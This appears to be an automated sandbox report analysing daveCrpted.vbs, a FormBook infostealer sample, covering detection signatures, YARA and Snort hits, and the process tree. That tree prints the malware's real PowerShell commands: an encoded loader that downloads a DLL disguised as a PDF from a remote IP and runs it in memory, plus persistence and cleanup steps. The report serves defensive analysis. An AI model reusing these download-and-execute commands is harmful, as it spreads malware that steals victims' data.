Windows
Analysis Report
daveCrpted.vbs
Overview
General Information
Detection
FormBook
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Downloads files with wrong headers with respect to MIME Content-Type
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64
- wscript.exe (PID: 6884 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\daveCrpted.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
- powershell.exe (PID: 7076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 6384 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth')) MD5: 95000560239032BC68B4C2FDFCDEF913)
- powershell.exe (PID: 6508 cmdline: "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 4364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- RegAsm.exe (PID: 6656 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
- explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- powershell.exe (PID: 6936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 1288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5 MD5: 95000560239032BC68B4C2FDFCDEF913)
- wscript.exe (PID: 4028 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
- powershell.exe (PID: 5680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 6516 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth')) MD5: 95000560239032BC68B4C2FDFCDEF913)
- RegAsm.exe (PID: 3300 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
- cmmon32.exe (PID: 6076 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
- cmd.exe (PID: 6204 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 3020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- explorer.exe (PID: 2596 cmdline: explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- explorer.exe (PID: 4996 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cleanup
No configs have been found
Rule | Description | Author
---|---|---
JoeSecurity_FormBook | Yara detected FormBook | Joe Security
Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
SUSP_Reversed_Base64_Encoded_EXE | Detects an base64 encoded executable with reversed characters | Florian Roth
JoeSecurity_FormBook | Yara detected FormBook | Joe Security

5 of 40 entries shown
Rule | Description | Author
---|---|---
JoeSecurity_FormBook | Yara detected FormBook | Joe Security
Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
MALWARE_Win_DLAgent09 | Detects known downloader agent | ditekSHen

5 of 51 entries shown
No Sigma rule has matched
Timestamp | SID | Source IP | Source Port | Destination IP | Destination Port | Protocol | Classtype
---|---|---|---|---|---|---|---
05/27/22-21:15:31.357258 | 2025011 | 20.106.232.4 | 80 | 192.168.2.5 | 49738 | TCP | A Network Trojan was detected
05/27/22-21:16:25.336336 | 2025011 | 20.106.232.4 | 80 | 192.168.2.5 | 49778 | TCP | A Network Trojan was detected
05/27/22-21:19:38.241995 | 2031449 | 192.168.2.5 | 49870 | 118.27.122.216 | 80 | TCP | A Network Trojan was detected
05/27/22-21:19:38.241995 | 2031412 | 192.168.2.5 | 49870 | 118.27.122.216 | 80 | TCP | A Network Trojan was detected
05/27/22-21:19:38.241995 | 2031453 | 192.168.2.5 | 49870 | 118.27.122.216 | 80 | TCP | A Network Trojan was detected
AV Detection |
---|
Source: | ReversingLabs: |
Source: | File source: | ||
Source: | Avira URL Cloud: | ||
Source: | Virustotal: | Perma Link |
Source: | Avira: | ||
Source: | Binary string: | ||
Source: | File opened: | ||
Source: | Code function: | ||
Networking |
---|
Source: | Snort IDS: | ||
Source: | Bad PDF prefix: |